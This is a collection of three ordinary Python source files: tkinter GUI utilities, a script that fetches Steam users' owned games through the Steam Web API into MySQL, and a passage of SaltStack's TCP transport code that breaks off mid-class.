import traceback
from Utils import data_path, is_bundled
def set_icon(window):
er16 = tk.PhotoImage(file=data_path('ER16.gif'))
er32 = tk.PhotoImage(file=data_path('ER32.gif'))
er48 = tk.PhotoImage(file=data_path('ER48.gif'))
window.tk.call('wm', 'iconphoto', window._w, er16, er32, er48) # pylint: disable=protected-access
# Although tkinter is intended to be thread safe, there are many reports of issues
# some which may be platform specific, or depend on if the TCL library was compiled without
# multithreading support. Therefore I will assume it is not thread safe to avoid any possible problems
class BackgroundTask(object):
def __init__(self, window, code_to_run, *code_arg):
self.window = window
self.status = None
self.queue = queue.Queue()
self.running = True
self.task = threading.Thread(target=self.try_run, args=(code_to_run, *code_arg))
self.task.start()
self.process_queue()
def try_run(self, code_to_run, *code_arg):
try:
code_to_run(*code_arg)
except Exception as e:
self.update_status('Error: ' + str(e))
if not is_bundled():
traceback.print_exc()
self.queue_event(self.stop)
def update_status(self, text):
self.status = text
def stop(self):
self.running = False
#safe to call from worker
def queue_event(self, event):
self.queue.put(event)
def process_queue(self):
try:
while True:
if not self.running:
return
event = self.queue.get_nowait()
event()
if self.running:
#if self is no longer running self.window may no longer be valid
self.window.update_idletasks()
except queue.Empty:
pass
if self.running:
self.window.after(100, self.process_queue)
class BackgroundTaskProgress(BackgroundTask):
def __init__(self, parent, title, code_to_run, *code_arg):
self.parent = parent
self.window = tk.Toplevel(parent)
self.window['padx'] = 5
self.window['pady'] = 5
try:
self.window.attributes("-toolwindow", 1)
except tk.TclError:
pass
self.window.title(title)
self.lastpercent = 0
self.progress_var = tk.DoubleVar()
self.progress = tk.ttk.Progressbar(self.window, variable=self.progress_var, length=300)
self.progress.pack()
self.label_var = tk.StringVar(value="")
self.label = tk.Label(self.window, textvariable=self.label_var, width=50, wrap=300)
self.label.pack()
self.button_var = tk.StringVar(value="Please wait...")
self.button = tk.Button(self.window, textvariable=self.button_var, width=10, height=2, state='disabled', command=self.close)
self.button.pack()
self.window.resizable(width=False, height=False)
set_icon(self.window)
self.window.transient(parent)
self.window.protocol("WM_DELETE_WINDOW", self.close_pass)
self.window.grab_set()
self.window.geometry("+%d+%d" % (parent.winfo_rootx()+50, parent.winfo_rooty()+150))
self.window.focus_set()
super().__init__(self.window, code_to_run, *tuple(list(code_arg) + [self]))
self.parent.wait_window(self.window)
def close_pass(self):
pass
#safe to call from worker thread
def update_status(self, text):
self.queue_event(lambda: self.label_var.set(text))
def update_progress(self, val):
if int(val) != self.lastpercent:
self.lastpercent = int(val)
self.queue_event(lambda: self.progress_var.set(val))
def update_title(self, text):
self.queue_event(lambda: self.window.title(text))
def close(self):
self.running = False
self.window.destroy()
def stop(self):
self.running = False
self.progress_var.set(100)
self.window.bell()
self.button.configure(state='normal')
self.button_var.set("OK")
class Dialog(tk.Toplevel):
def __init__(self, parent, title=None, question=None, oktext=None, canceltext=None):
tk.Toplevel.__init__(self, parent)
self.transient(parent)
if title:
self.title(title)
self.parent = parent
self.result = False
if question:
body = tk.Frame(self)
label = tk.Label(body, text=question, width=50, wrap=200)
label.pack()
body.pack(padx=5, pady=5)
box = tk.Frame(self)
w = tk.Button(box, text=oktext if oktext else "OK", width=20, command=self.ok, default=tk.ACTIVE)
w.pack(side=tk.LEFT, padx=5, pady=5)
w = tk.Button(box, text=canceltext if canceltext else "Cancel", width=20, command=self.cancel)
w.pack(side=tk.LEFT, padx=5, pady=5)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.cancel)
box.pack()
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
parent.winfo_rooty()+150))
self.wait_window(self)
#
# standard button semantics
def ok(self, event=None):
self.result = True
self.withdraw()
self.update_idletasks()
self.cancel()
def cancel(self, event=None):
# put focus back to the parent window
self.parent.focus_set()
self.destroy()
class ToolTips(object):
# This class derived from wckToolTips which is available under the following license:
# Copyright (c) 1998-2007 by Secret Labs AB
# Copyright (c) 1998-2007 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and its
# associated documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appears in all
# copies, and that both that copyright notice and this permission notice
# appear in supporting documentation, and that the name of Secret Labs
# AB or the author not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO
# THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
label = None
window = None
active = 0
tag = None
after_id = None
@classmethod
def getcontroller(cls, widget):
if cls.tag is None:
cls.tag = "ui_tooltip_%d" % id(cls)
widget.bind_class(cls.tag, "<Enter>", cls.enter)
widget.bind_class(cls.tag, "<Leave>", cls.leave)
widget.bind_class(cls.tag, "<Motion>", cls.motion)
widget.bind_class(cls.tag, "<Destroy>", cls.leave)
# pick suitable colors for tooltips
try:
cls.bg = "systeminfobackground"
cls.fg = "systeminfotext"
widget.winfo_rgb(cls.fg) # make sure system colors exist
widget.winfo_rgb(cls.bg)
except Exception:
cls.bg = "#ffffe0"
cls.fg = "black"
return cls.tag
@classmethod
def register(cls, widget, text):
if isinstance(text, str):
text = '\n'.join([line.strip() for line in text.splitlines()]).strip()
widget.ui_tooltip_text = text
widget.ui_tooltip_text_prev = None
tags = list(widget.bindtags())
tags.append(cls.getcontroller(widget))
widget.bindtags(tuple(tags))
@classmethod
def unregister(cls, widget):
tags = list(widget.bindtags())
tags.remove(cls.getcontroller(widget))
widget.bindtags(tuple(tags))
# event handlers
@classmethod
def enter(cls, event):
widget = event.widget
if not cls.label:
# create and hide balloon help window
cls.popup = tk.Toplevel(bg=cls.fg, bd=1)
cls.popup.overrideredirect(1)
cls.popup.withdraw()
cls.label = tk.Label(
cls.popup, fg=cls.fg, bg=cls.bg, bd=0, padx=2, justify=tk.LEFT, wrap=400
)
cls.label.pack()
cls.active = 1
cls.xy = event.x_root + 16, event.y_root + 10
cls.event_xy = event.x, event.y
cls.after_id = widget.after(200, cls.display, widget)
@classmethod
def motion(cls, event):
cls.xy = event.x_root + 16, event.y_root + 10
cls.event_xy = event.x, event.y
cls.display(event.widget)
@classmethod
def display(cls, widget):
# display balloon help window
if cls.active:
text = widget.ui_tooltip_text
if callable(text):
text = text(widget, cls.event_xy)
if not text:
return
if widget.ui_tooltip_text_prev == text:
return
widget.ui_tooltip_text_prev = text
cls.label.config(text=text)
cls.popup.deiconify()
cls.popup.lift()
cls.popup.geometry("+%d+%d" % cls.xy)
cls.after_id = None
@classmethod
def leave(cls, event):
widget = event.widget
widget.ui_tooltip_text_prev = None
if cls.active:
cls.popup.withdraw()
cls.active = 0
if cls.after_id:
widget.after_cancel(cls.after_id)
cls.after_id = None
class ValidatingEntry(tk.Entry):
def __init__(self, master, command=lambda:True, validate=lambda self, value: value, **kw):
tk.Entry.__init__(self, master, **kw)
self.validate = validate
self.command = command
if 'textvariable' in kw:
self.__variable = kw['textvariable']
else:
self.__variable = tk.StringVar()
self.__prev_value = self.__variable.get()
self.__variable.trace("w", self.__callback)
self.config(textvariable=self.__variable)
def __callback(self, *dummy):
new_value = self.__variable.get()
valid_value = self.validate(new_value)
if valid_value is None:
self.__variable.set(self.__prev_value)
elif valid_value != new_value:
self.__prev_value = valid_value
self.__variable.set(self.valid_value)
else:
self.__prev_value = new_value
self.command()
class SearchBox(tk.ttk.Combobox):
def __init__(self, master, options, **kw):
tk.ttk.Combobox.__init__(self, master, **kw)
self.options = options
if 'textvariable' in kw:
self.__variable = kw['textvariable']
else:
self.__variable = tk.StringVar()
self.__variable.trace('w', self.__callback)
self.bind("<<ComboboxSelected>>", self.__select_callback)
self.config(textvariable=self.__variable, values=list(self.options))
def __callback(self, *dummy):
search_key = self.__variable.get().lower()
filter_options = list(filter(lambda value: search_key in value.lower(), self.options))
self.config(values=filter_options)
def __select_callback(self, *dummy):
self.config(values=list(self.options))
|
user_owned_games.py
|
import requests
import time
import json
import threading
import queue
import yaml
from sqlalchemy import create_engine
from sqlalchemy.types import BigInteger, Integer
import pandas as pd
def split_list(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
def worker_get_owned_games(lst_user_id, api_key, q):
dic_temp = {}
for user_id in lst_user_id:
for i in range(3):
try:
r = requests.get(
url = 'http://api.steampowered.com/IPlayerService/GetOwnedGames/v0001/',
params = {
'key' : api_key,
'steamid' : user_id,
'include_played_free_games': True,
'format' : 'json'
}
)
dic_owned_games = r.json().get('response').get('games')
dic_temp[user_id] = dic_owned_games
time.sleep(.5)
break
except Exception as e:
print(user_id, e)
time.sleep(5)
q.put(dic_temp)
def get_owned_games():
config = yaml.safe_load(open('config.yaml'))
api_key = config['steam']['api_key']
if not api_key:
return "No API Key found!"
dic_owned_games = {}
with open('../data/steam_user_id.txt', 'r') as f:
lst_user_id = [i.strip() for i in f.readlines()]
print("The number of user ids: {}".format(len(lst_user_id)))
for lst_user_id_chunk in list(split_list(lst_user_id, 500)):
lst_thread = []
q = queue.Queue()
for i in list(split_list(lst_user_id_chunk, 100)):
t = threading.Thread(target = worker_get_owned_games, args = (i, api_key, q,))
lst_thread.append(t)
for i in lst_thread:
i.start()
for i in lst_thread:
i.join()
while not q.empty():
dic_owned_games.update(q.get())
with open('../data/steam_owned_games.txt', 'w') as f:
for k,v in dic_owned_games.items():
f.write(json.dumps({k:v}))
f.write('\n')
def save_owned_games():
config = yaml.safe_load(open('config.yaml'))
db_username = config['mysql']['username']
db_password = config['mysql']['password']
db_endpoint = config['mysql']['endpoint']
db_database = config['mysql']['database']
engine = create_engine('mysql+pymysql://{}:{}@{}/{}?charset=utf8mb4'.format(db_username, db_password, db_endpoint, db_database))
dic_owned_games = {}
with open('../data/steam_owned_games.txt', 'r') as f:
for raw_string in f.readlines():
user_id, lst_inventory = list(json.loads(raw_string).items())[0]
if lst_inventory:
for i in lst_inventory:
app_id = i.get('appid')
playtime_forever = i.get('playtime_forever', 0)
if playtime_forever > 0:
dic_owned_games.update({
(user_id, app_id) : {
'user_id' : user_id,
'app_id' : app_id,
'playtime_forever' : playtime_forever
}
})
df_owned_games = pd.DataFrame.from_dict(dic_owned_games, 'index')
df_owned_games.to_sql(
'game_steam_user',
engine,
if_exists='replace',
index=False,
dtype={
'user_id': BigInteger(),
'app_id': Integer(),
'playtime_forever': Integer()
},
chunksize = 10000
)
save_owned_games()
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import time
import traceback
import urllib.parse
import salt.crypt
import salt.exceptions
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
from salt.transport import iter_transport_opts
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP # nosec
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to tcp.
Note: this class returns a singleton
"""
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = dict(opts)
if "master_uri" in kwargs:
self.opts["master_uri"] = kwargs["master_uri"]
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get("resolver")
parse = urllib.parse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(
self.opts,
args=(
self.opts,
master_host,
int(master_port),
),
kwargs={
"io_loop": self.io_loop,
"resolver": resolver,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_ret_port"),
},
)
def close(self):
if self._closing:
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
self.message_client.close()
# pylint: disable=W1701
def __del__(self):
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
"""
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
try:
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except salt.ext.tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError("Connection to master lost")
raise salt.ext.tornado.gen.Return(ret)
class AsyncTCPPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
async_methods = [
"send_id",
"connect_callback",
"connect",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.message_client = None
self.event = salt.utils.event.get_event("minion", opts=self.opts, listen=False)
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
if self.event is not None:
self.event.destroy()
self.event = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def send_id(self, tok, force_auth):
"""
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
"""
load = {"id": self.opts["id"], "tok": tok}
@salt.ext.tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise salt.ext.tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while (
count <= self.opts["tcp_authentication_retries"]
or self.opts["tcp_authentication_retries"] < 0
):
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event({"master": self.opts["master"]}, "__master_connected")
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get("__role") == "syndic":
data = "Syndic {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "syndic")
else:
data = "Minion {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "minion")
load = {
"id": self.opts["id"],
"cmd": "_minion_event",
"pretag": None,
"tok": self.tok,
"data": data,
"tag": tag,
}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel,
(self.opts,),
loop_kwarg="io_loop",
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info(
"fire_master failed: master could not be contacted. Request timed"
" out."
)
except Exception: # pylint: disable=broad-except
log.info("fire_master failed: %s", traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event({"master": self.opts["master"]}, "__master_disconnected")
@salt.ext.tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b"salt")
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4505)) != 4505:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts["master_ip"], int(self.publish_port)),
kwargs={
"io_loop": self.io_loop,
"connect_callback": self.connect_callback,
"disconnect_callback": self.disconnect_callback,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_publish_port"),
},
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt: # pylint: disable=try-except-raise
raise
except Exception as exc: # pylint: disable=broad-except
if "-|RETRY|-" not in str(exc):
raise SaltClientError(
"Unable to sign_in to master: {}".format(exc)
) # TODO: better error message
def on_recv(self, callback):
"""
Register an on_recv callback
"""
if callback is None:
return self.message_client.on_recv(callback)
@salt.ext.tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we did, because the req_server is also handling this socket, when we call
# req_server.stop(), tornado will give us an AssertionError because it's trying to
# match the socket.fileno() (after close it's -1) to the fd it holds on it's _sockets cache
# so it can remove the socket from the IOLoop handlers
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
"""
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=self.io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, header, payload):
"""
Handle incoming messages from underlying tcp streams
"""
try:
try:
payload = self._decode_payload(payload)
except Exception: # pylint: disable=broad-except
stream.write(salt.transport.frame.frame_msg("bad load", header=header))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(
payload.get("load"), dict
):
yield stream.write(
salt.transport.frame.frame_msg(
"payload and load must be a dict", header=header
)
)
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if (
payload["enc"] == "clear"
and payload.get("load", {}).get("cmd") == "_auth"
):
yield stream.write(
salt.transport.frame.frame_msg(
self._auth(payload["load"]), header=header
)
)
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.write("Some exception handling minion payload")
log.error(
"Some exception handling a payload from minion", exc_info=True
)
stream.close()
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == "send":
stream.write(
salt.transport.frame.frame_msg(
self.crypticle.dumps(ret), header=header
)
)
elif req_fun == "send_private":
stream.write(
salt.transport.frame.frame_msg(
self._encrypt_private(
ret,
req_opts["key"],
req_opts["tgt"],
),
header=header,
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.write("Server-side exception handling payload")
stream.close()
except salt.ext.tornado.gen.Return:
raise
except salt.ext.tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error("Connection was unexpectedly closed", exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error("Unexpected exception occurred: %s", exc, exc_info=True)
raise salt.ext.tornado.gen.Return()
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
